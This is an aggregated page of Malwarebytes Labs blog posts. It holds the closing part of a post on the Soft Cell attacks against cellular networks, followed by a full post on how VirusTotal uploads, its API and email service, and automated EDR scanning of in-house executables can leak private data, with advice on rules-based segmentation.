With methods such as this, the people behind the malware daisy chain have an amazing slice of access to the individual with no direct specific risk. Everything at that point comes down to how well the cellular network is locked down, how good their security is, how on the ball their incident response team happens to be, and so on.

If (say) they failed to spot numerous attacks, left vulnerable servers online, missed telltale signs that something is amiss, let well-known RATs like PoisonIvy dance across their network, allowed the hackers to set up a bunch of VPN nodes…well, you can see where I’m going with this.

Where I’m going is several years later and a large slice of “Oh dear.”


Well, first thing’s first: don’t panic. It’s worth noting there isn’t any additional verification (yet) outside the initial threat report. Something bad has clearly happened here, but as to how severe it is, we’ll leave that to others to debate.

Whether this was pulled off by a high-level nation state approved group of attackers or a random collection of bored people in an apartment, one way or another those cell networks really had a number done on them. The impact to the individuals caught by this is the same, and one assumes they’ve been informed and taken appropriate action. We can only hope the cellular networks impacted have now taken appropriate measures and shored up their defences.

The post Cellular networks under fire from Soft Cell attacks appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Caution: Misuse of security tools can turn against you

Malwarebytes - Thu, 07/11/2019 - 17:34

We have a saying in Greece: “They assigned the wolf to watch over the sheep.”

In a security context, this is a word of caution about making sure the tools we use to keep our information private don’t actually cause the data leaks themselves. In this article, I will be talking about some cases that I have come across in which security tools have leaked data they were intended to secure.

The VirusTotal problem

VirusTotal (VT) is a multi-scanner in which an individual researcher is free to upload any file they believe is suspicious. They can then view results from many antivirus (AV) products as to whether or not the file is considered malware. While this is an amazing service which I am certain everyone in the infosec world uses regularly, its usage needs to be carefully thought over.

What some people don’t realize is that every file you submit to VirusTotal gets saved on VT’s servers and is fully searchable. By using an internal VT tool called Malware RetroHunting, malware hunters have the ability to search for text and binary patterns in order to find malware similar to ones that he may be analyzing or tracking.

This is a great feature, but as you can imagine, just as someone could search for [insert malicious string of your choice], they could just as easily search for “Account Number:”, which might result in loads of documents containing such data. It is important to bring awareness to this fact so that people can properly use this tool without risking their private data.

I will go through a few cases showing the misuse of VirusTotal to serve as a warning for users who might be thinking about using either second rate/ unofficial tools or adopting practices built off of VT.

Case 1: The no AV argument

I far too often hear people saying something like this: “I don’t need an AntiVirus. I send files to VT for free when they look suspicious.”

I think it should be quite obvious why this method is flawed. If you submit all documents you receive to VT, then you run the risk of leaking private information, as stated above. Now, if you exclude scanning of documents from specific “trusted” addresses (in order to not leak confidential data), then you run the risk of getting a malware phished to you from a spoofed contact. Needless to say, this is not a safe way to keep yourself protected.

Case 2: API usage

The use of VirusTotal API can also be dangerous. Bugs in the code or logic can easily cause a mass upload of private files. This is a danger whether you are building your own tools or using tools like WINJA, which automate submission of files to VT. The only recommendation here is to make sure the tools you are using are reputable or you have done your own independent code audits to make sure no bugs may lead to data leakage.

When it comes to using other reputable security tools, it is wise to read over all of the documentation and make sure you understand how and when the given tool will incorporate VT.

Case 3: VT email scanning service

I have unfortunately seen may articles and forum posts online where people have been giving advice to use the VT attachment scan service. Basically, by sending an email attachment to, the sender can receive a response as to what VT found regarding the attachment.

Please do not take such advice unless you are sure the document you are scanning contains no private data. It is a risky game. If you are worried about malicious documents infecting your computer, then the logical conclusion would be to buy an antivirus with a good reputation and the technology to block malicious documents.

If you choose to send all your potentially private emails to VT, searchable by anyone, then you’re essentially undoing any potential security or privacy benefits by exposing all your data anyway. What damage is a spyware going to do when you’ve already sent your sensitive data out to a public database?

EXE files problem

The next case I want to talk about, while less sensitive, is a lot more likely to be overlooked.

In a corporate environment, we cannot rely on everyone to manually submit attachments or files to security engineers—all of this is automated. From my past experience and from speaking with fellow security engineers, I have seen that it is quite common for all executables entering a corporate network to automatically get scanned with various plugins tied to a given platform. I will highlight Carbon Black, an enterprise antivirus program, in this case, although many other security providers have this problem as well.

When a new exe makes its way into a network, Carbon Black stores it, but also has the ability to cross reference the given file with various plugins and tools that are built in or added to the platform. For example, you can click a bubble on any given file in your network, which will give you its results against wildfire sandbox. And of course, the topic that has received so much heat in the media this year—the VT plugin.

Now, while they have fixed the issues on submitting documents to avoid leaking data, they still do submit exes. But wait, so what? Isn’t that exactly what we want it to do?

Correct, it is. Automation is what every corporation aims for in its security infrastructure. There is nothing wrong with the root idea of submitting and scanning exes flowing through the network. However, automation sometimes comes with a tradeoff if not properly planned.

I have evaluated the security infrastructure of many corporate networks and in these evaluations, I have seen that in this attempt to scan all new exes for malware, the company’s in-house executables end up getting scanned as well.

So now, confidential exes are unknowingly being exposed and leaking arguably more sensitive data and intellectual property. In addition, think for a moment about how software developers typically code. While they are testing functionality, it is common for a developer to hard code some credentials, paths, or other revealing information for a test build. Sure, after they are done, for the production build, it will likely get changed to hide this information and make it dynamic, but in the meantime, these demo builds have been picked up by the EDR and scanned through various plugins.

Again, this is not a problem with the EDR itself, it is a problem with its implementation, entirely the responsibility of the customer using the software.

Remediation and prevention

Now this does not mean we need to abandon use of security tools for fear of data leaks; it simply means we need to make some adjustments. So what can a business do to protect against leaking their own data to the public?

There are many options which will depend upon the compliance requirements and needs of a given company, but I have a few base considerations I recommend.

Rules-based segmentation

Rather than having a blanket automation where everything is automatically scanned, I always recommend segmenting the actions taken when the EDR sees a new file based on user groups. For example, maybe users in the developers’ group do not have their binaries residing in a specific directory sent for auto scanning.

However, this is easier said than done because just simply enabling this type of rule can be catastrophic and may essentially allow a developer free rein to secretly develop malware. That’s why, when one security rule is relaxed for a given user, another rule must be increased to make up for it. So in this theoretical scenario, we have just given a developer a free pass to not have his executables scanned. So we have closed one door but opened another.

To make up for this, one thought might be to keep heavy watch on the IPs and ports that the dev machines are allowed to communicate over. If the developer needs to communicate with a specific IP for his software, he should get approval in advance from the security engineers. At this point, we can let the developer go ahead and create malware, but if his MAC address or IP is seen attempting communication with a non pre-approved IP or over a non pre-approved port, fire alerts. This type of rule is trivial to create using a good EDR platform.

The roles and expected behavior of a given employee’s machine must be fully understood beforehand to be able to keep proper control over a network.

Understand the tools you use

It is important to understand that security tools are made for generic use. The creators do not know specifically what your company does and what your privacy policies are. They do not know whether you will be developing your own software onsite or whether you are simply using the tool to scan downloaded files.

That being said, it is up to you, the user or security engineer in charge of evaluating, to make sure you understand all of the functionality and options a tool gives you.

A developer who creates a tool to scan email attachments automatically with VT is not necessarily acting maliciously. For some users, maybe a user who specifically does not create and store info in documents, this might be the best tool in the world, exactly what they need to automate their operations. For another company who sends their contracts in the form of Word documents, this might be catastrophic. At the end of the day, the responsibility cannot be blamed on the tool that behaved exactly as advertised. It’s up to the user to do her own research and understand what the tool does and how it will effect privacy and security.

The post Caution: Misuse of security tools can turn against you appeared first on Malwarebytes Labs.

Categories: Techie Feeds


Subscribe to Furiously Eclectic People aggregator - Techie Feeds